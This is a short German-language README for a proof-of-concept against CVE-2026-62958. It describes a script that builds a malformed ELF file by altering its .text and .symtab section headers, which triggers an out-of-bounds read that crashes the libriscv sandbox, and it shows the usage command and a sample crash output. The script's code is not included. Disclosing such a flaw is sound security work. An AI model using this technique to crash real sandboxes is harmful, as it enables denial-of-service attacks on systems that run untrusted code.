
Proof-of-Concept für CVE-2026-62958: Erstellt ein fehlerhaftes ELF, um einen Out-of-Bounds-Read in Libriscv auszulösen und die Sandbox mit SIGSEGV zum Absturz zu bringen.
Eine Schwachstelle in Libriscv ermöglicht es einem Angreifer, die Sandbox durch einen Out-of-Bounds-Read zum Absturz zu bringen.
Um 'Bad elf' zu erstellen:
python3 poc.py samplefile poisoned_file
Ergebnisse:
❯ python3 poc.py fib poisoned_file
Manipulating .text section header at offset 0x250
Manipulating .symtab section header at offset 0x710
❯ ./rvlinux poisoned_file
fish: Job 1, './rvlinux poisoned_file' terminated by signal SIGSEGV (Address boundary error)